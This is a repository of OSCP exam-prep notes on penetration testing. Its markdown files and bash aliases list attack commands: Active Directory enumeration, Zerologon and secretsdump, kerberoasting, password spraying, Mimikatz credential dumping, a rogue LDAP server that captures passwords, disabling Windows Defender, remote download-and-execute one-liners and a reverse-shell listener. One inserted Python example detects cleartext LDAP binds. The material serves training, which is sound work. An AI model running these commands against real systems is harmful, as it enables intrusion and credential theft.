Repository layout:

```
├── Active Directory
│   └── AD.md
├── Bash-Aliases
│   └── bash_aliases.sh
├── Misc
│   ├── Cheatsheets.md
│   └── Misc.md
├── README.md
├── Recon
│   └── Recon.md
└── Transferring Files
    ├── transferring from windows.md
    └── transferring to windows.md
```

/Active Directory/AD.md:
--------------------------------------------------------------------------------

## HackTheBox AD machines
Do the following machines and watch ippsec's videos on them:
- monteverde
- cascade
- traversex
- fuse
- intelligence
- remote
- resolute
- sizzle
- multimaster
- sauna
- forest
- object
- active

# Enumeration

## RPC
RPC Null Authentication: `rpcclient -U '' `

RPC Null Authentication with no password: `rpcclient -U '' `

If you are able to log in, run `enumdomusers` to list the users.

If you get a list of users, you can check their descriptions with the following command:

`querydispinfo`

## SMTP
`nmap -v --script="smtp*" -p25,110,143,465,587,993,995 `

## SMB
`crackmapexec smb --shares`

`crackmapexec smb -u '' -p '' --shares`

`crackmapexec smb -u '' --shares`

`crackmapexec smb --pass-pol`

`crackmapexec smb --users`

`smbmap -H `

`smbclient -L //`

`smbclient --no-pass /// -U''`

## LDAP
git clone windapsearch by ropnop if you don't already have it

`python windapsearch.py -U --full --dc-ip `

- pipe this out to a tmp file and use the following command to sort.
once sorted, look for interesting strings such as `password` or `pwd`
- `cat tmp | awk '{print $1}' | sort | uniq -c | sort -nr | grep ':'`
- YOU SHOULD THEN `grep -i` FOR:
  - `pass`
  - `pwd`
  - `password`
  - etc.

### Hosting a Rogue LDAP Server

Install the following packages: `apt-get install slapd ldap-utils`

Enable the package on boot with `systemctl enable slapd`

Configure the server to make it insecure with `dpkg`:

- `dpkg-reconfigure -p low slapd`
- When prompted, select `No`
- provide the target domain, e.g. `hiddenleaf.local`
- use the same domain as the organization name
- provide an admin password, e.g. `admin123`
- select `MDB` as the database to use
- select `yes` for the database to be removed when slapd is purged
- `yes` to move the old database

To allow credentials to be shown in clear text we have to downgrade the SASL security properties (`minssf=0` accepts binds with no confidentiality, so clients fall back to simple binds and the password crosses the wire unencrypted). Create an ldif file called `olcSaslSecProps.ldif`:

```
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```

Use the file to patch the LDAP server:

- `sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif`
- `systemctl restart slapd` or `service slapd restart`

Now listen using tcpdump:

`sudo tcpdump -SX -i eth0 tcp port 389`

It might take a few tries before you receive anything if you are running over a VPN.

## Zero Logon

*Do not run this in a production environment, as it may break the domain controller*

git clone the GitHub repo for `CVE-2020-1472` by dirkjanm and then download the `zero-logon tester` script for the same CVE by SecuraBV

run the tester script with the following syntax:

- `python3 zerologontester.py `

if the script confirms the vulnerability, we can
use secretsdump to dump the NTDS.DIT file:

- `impacket-secretsdump /\$@ -just-dc`
- the `$` represents an empty value/string

# If you have a Valid User(s) and or Password(s):

- `python3 bloodhound.py -ns -d -dc -u -p -c All`

- `rpcclient -U '' ` then run `enumdomusers`; with the resulting users you can try `GetUserSPNs` or `GetNPUsers`

- *NO PASS REQ* `./kerbrute userenum -dc -d users.txt`
  - if this command fails, try syncing your attack machine's clock with the domain controller's, because Kerberos authentication requires the clocks to be in sync:
  - `ntpdate `

- `./kerbrute passwordspray --dc -d users.txt `
  - if this command fails, try syncing your attack machine's clock with the domain controller's, because Kerberos authentication requires the clocks to be in sync:
  - `ntpdate `

- `impacket-GetUserSPNs /: -outputfile krbroast`

- *NO PASS REQ* `impacket-GetNPUsers -dc-ip -no-pass -usersfile users.txt /` OR `impacket-GetNPUsers -dc-ip -no-pass /`

- `crackmapexec smb/winrm -u -p --no-bruteforce --continue-on-success`

- `crackmapexec smb -u -p --shares -M spider_plus`

- `crackmapexec smb -u -p -M spider_plus`
  - to list the contents found by the spider_plus module you have to use `jq` to parse the data. To list everything in all the found shares run `cat /tmp/cme_spider_plus/.json | jq '.
| map_values(keys)'`

## Misc

### Change User Pass with `rpcclient`
If your current user has the `ForceChangePassword` edge on another user (which you can find in BloodHound), you can use rpcclient to change that user's password, then read shares with smbclient/cme or do more enumeration with the new user and password.
Be sure to choose a password that fits the password policy.

- `rpcclient -U `

- `setuserinfo2 23 ''`

### Change User Pass with `smbpasswd`
`smbpasswd -U -r `

### Mount SMB Share
`sudo mount -t cifs -o 'username=,password=' /// /mnt/`

### Cracking GPP Password/Hash
This decrypts a GPP `cpassword` value (the encrypted password attribute in Group Policy Preference XML files under SYSVOL):

`gpp-decrypt `

# AD Enumeration (Post Compromise)

### Powerview

Quick Commands:

- `Get-NetDomain`

- `Get-NetDomainController`

- `Get-DomainPolicy`

- `(Get-DomainPolicy)."system access"`

- `Get-NetUser | select cn,description` (select whichever properties you need, e.g. `cn`, `description`)

- `Get-UserProperty -Properties pwdlastset`

- `Get-UserProperty -Properties logoncount`: don't attack accounts with a low logoncount because they might be honeypot accounts. As soon as you compromise one, the security team will be alerted to your presence.

You can find a whole PowerView cheatsheet here: [https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)

### Bloodhound

1. Connect to the database by running: `sudo neo4j console`
2. run `bloodhound` in a new tab
3. Transfer the SharpHound.ps1 script to the victim machine and invoke PowerShell using `powershell -ep bypass`
4. Import the module: `. .\SharpHound.ps1`
5. Collect the data: `Invoke-BloodHound -CollectionMethod All -Domain SCRIPTKIDDIEHUB -ZipFileName tadi.zip`

or use `SharpHound.exe -c All`

Transfer the zip file to your attacker machine and upload it to BloodHound, which will put it all into graphs.

--------------------------------------------------------------------------------

/Bash-Aliases/bash_aliases.sh:
--------------------------------------------------------------------------------

```bash
alias venv='virtualenv -p python2.7 venv'                      # create a python 2 virtual env
alias actv='source /home/kali/venv/bin/activate'               # activate the created virtual env
alias server='sudo python3 -m http.server 80'                  # static web server
alias ghidra='python3 /home/kali/tools/ghidra-auto/ghidra.py'  # open ghidra with one command - not necessarily useful for OSCP
alias pwdcp='pwd | xclip -selection clipboard'                 # copy path of current working directory

# Port Scanning
# Rustscan combined with Nmap using a bash function for all ports
# Usage: `rusty `
rusty() {
    IP=$1
    /home/kali/.cargo/bin/rustscan -a "$IP" -- -A -v -oN "$PWD/nmapinit"
}

# SMB Enum
# Nmap and enum4linux-ng using a bash function. This creates a directory called enum in the current working directory.
# Usage: `win-enum `
win-enum() {
    IP=$1
    echo "Starting SMB Enum Scripts..."
    mkdir -p enum
    nmap --script "smb-enum*" -p139,445 -oN "$PWD/enum/nmap-smb-enum" "$IP"

    echo "Starting SMB Vuln Scripts..."
    nmap --script "smb-vuln*" -p139,445 -oN "$PWD/enum/nmap-smb-vuln" "$IP"

    echo "Starting Enum4Linux..."
    /home/kali/tools/enum4linux-ng/enum4linux-ng.py -A "$IP" -oY "$PWD/enum/enum4l"
}

# netcat reverse shell listener
# Usage: rev <port>
# (assumed body: the original file repeated the rusty() body here by mistake)
rev() {
    PORT=$1
    nc -lvnp "$PORT"
}
```

--------------------------------------------------------------------------------

/Misc/Cheatsheets.md:
--------------------------------------------------------------------------------

# SQL Injection Cheatsheets
- Portswigger: https://portswigger.net/web-security/sql-injection/cheat-sheet

- Pentester Monkey: https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

- Perspectiverisk MySQL: https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/

- Perspectiverisk MSSQL: https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/

# Windows Priv Esc
- Hacktricks: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation

# Linux Priv Esc
- Hacktricks: https://book.hacktricks.xyz/linux-hardening/privilege-escalation

--------------------------------------------------------------------------------

/Misc/Misc.md:
--------------------------------------------------------------------------------

# Cracking zip file
- `fcrackzip -v -u -D -p `

# Mimikatz
`mimi.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"`

# Downloading from SMBClient
- turn prompting off using `prompt off`
- `recurse on`
- `mget *`

# Pulling down MSSQL NTLMv2 hash
start an smbserver and in the mssql console run `exec xp_dirtree '\\\\',1,1` then check the smb server for the hash

# SMBClient
List shares: `smbclient -L \\\\\\`

Connect without a password: `smbclient --no-pass -N ///Backups`

# Mount remote share
`sudo apt install libguestfs-tools`

`sudo apt install cifs-utils`

`sudo
mkdir /mnt/remote`

`mount -t cifs ///Backups /mnt/remote -o rw`

# SMBClient to shell
If you are able to access a share you can write to, and that share backs a website, you can get a shell by uploading `nc.exe` to the share along with a malicious `php` file containing the following code:

```php

```

Go to the website and navigate to the `php` file while you have a listener running.

# Run command as different user
`sudo -u 'command'`

# Extract/open .img file
`binwalk -e <.img FILE>`

# Old SSH key exchange bruteforce
For old Linux distributions and boxes, bruteforcing SSH with hydra might not work because of the key exchange limitations.

You can use a tool called `Patator` with the following syntax:

- `patator ssh_login host= port= user= password=FILE0 0= persistent=0`

# Matching key exchange
`ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss`

# MSSQL
Log in to MSSQL remotely:

`sqsh -S -U sa -P `

# Disable windefend (if running as NT AUTHORITY\SYSTEM)
`powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true -Verbose"`

--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------

# OSCP-Notes
Most of the notes, resources and scripts I used to prepare for the OSCP and pass it the first time.

There are a bunch of sections in these notes; some sections have their own folders, just look around.

The repo isn't complete yet, I will continue to update it regularly.
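Added example, not part of these notes: a parser for what the `tcpdump` on port 389 in the Rogue LDAP Server section of AD.md above actually captures. With `minssf=0` clients fall back to LDAP simple binds, whose BER-encoded BindRequest carries the bind DN and the password in the clear, so the same decoding lets a defender alert on cleartext binds on their own network. The sample packet is constructed here using the notes' `hiddenleaf.local`/`admin123` values, and `ber_tlv`, `ber_encode` and `parse_ldap_bind` are my own helpers, not from any library.

```python
def ber_tlv(buf: bytes, pos: int = 0):
    """Decode one BER TLV starting at pos; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length

def parse_ldap_bind(payload: bytes):
    """Return details of an LDAP BindRequest, or None if payload is not one.
    Only the secret's length is reported, so a monitor never logs the password."""
    try:
        tag, msg, _ = ber_tlv(payload)
        if tag != 0x30:                     # LDAPMessage is a SEQUENCE
            return None
        _, msg_id, pos = ber_tlv(msg)       # INTEGER messageID
        op_tag, op, _ = ber_tlv(msg, pos)
        if op_tag != 0x60:                  # [APPLICATION 0] is BindRequest
            return None
        _, version, pos = ber_tlv(op)       # INTEGER version
        _, name, pos = ber_tlv(op, pos)     # OCTET STRING bind DN
        auth_tag, auth, _ = ber_tlv(op, pos)  # AuthenticationChoice
    except IndexError:                      # truncated or garbled packet
        return None
    simple = auth_tag == 0x80               # [0] simple: raw password on the wire
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "bind_dn": name.decode("utf-8", "replace"),
        "auth": "simple" if simple else "sasl",
        "cleartext_secret_len": len(auth) if simple else 0,
    }

def ber_encode(tag: int, value: bytes) -> bytes:
    """Short-form BER encoder (values under 128 bytes) for building the sample."""
    return bytes([tag, len(value)]) + value

# Constructed sample: a client binding to the rogue server with the notes' admin123.
SAMPLE_SIMPLE_BIND = ber_encode(0x30,
    ber_encode(0x02, b"\x01") +             # messageID = 1
    ber_encode(0x60,
        ber_encode(0x02, b"\x03") +         # LDAP version 3
        ber_encode(0x04, b"cn=admin,dc=hiddenleaf,dc=local") +
        ber_encode(0x80, b"admin123")))     # simple auth: password in the clear
```

Feed it the TCP payloads from the capture (for example via scapy or a pcap reader) and alert whenever `auth` is `simple`; a SASL bind (tag 0xA3) is reported without any secret length.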
--------------------------------------------------------------------------------

/Recon/Recon.md:
--------------------------------------------------------------------------------

# Directory Bruteforcing

## Gobuster
- `gobuster dir -u http://"$IP"/ -w /usr/share/wordlists/dirb/common.txt --no-error -o $PWD/enum/gobustergob-common -x asp,php`

- `gobuster dir -u http://"$IP"/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt --no-error -o $PWD/enum/gobustergob-raft-small-words -x asp,php`

- `gobuster dir -u http://"$IP"/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --no-error -o $PWD/enum/gobuster/gob-directory-small -x asp,php`

## DirSearch
`dirsearch -u http:/// --exclude-status=300,400-499,500-599 -o dirsearch`

# SubDomain Enum
`wfuzz -c -f sub-finder -w -u '' -H "Host: FUZZ.cmess.thm" --hw `

# Hidden Parameter Fuzzing
`wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hh `

# LFI
`wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hh `

--------------------------------------------------------------------------------

/Transferring Files/transferring from windows.md:
--------------------------------------------------------------------------------

## FTP Server
Host an FTP server on your Kali machine: `python3 -m pyftpdlib -p 21 --write`

Now, using ftp on the compromised Windows machine, connect to your FTP server using anonymous access: `ftp `

Remember to use `binary` mode when transferring files.
## SMB Server
`impacket-smbserver tadi .`

- use `-smb2support` if the machine is running SMB version 2

on the Windows machine run `net use \\\tadi`

you can copy from the Windows machine using: `copy C:\bank-account.zip Z:\bank-account.zip` or cd into `Z:\` then `copy C: .`

`Z:\` would be the name of the share that you opened

## PHP Server
If PHP is installed on the Windows client, host a server and connect to it from your Kali machine:

`php -S 0.0.0.0:`

--------------------------------------------------------------------------------

/Transferring Files/transferring to windows.md:
--------------------------------------------------------------------------------

Transferring files to the compromised Windows machine:

- `curl -o http://`
- `certutil.exe -urlcache -f http:/// `
- `iex(new-object net.webclient).downloadstring('http:///')`

Using winrm:
`upload ` for example `upload /home/kali/tools/winpeas.exe C:\\users\\tadi\\winpeas.exe`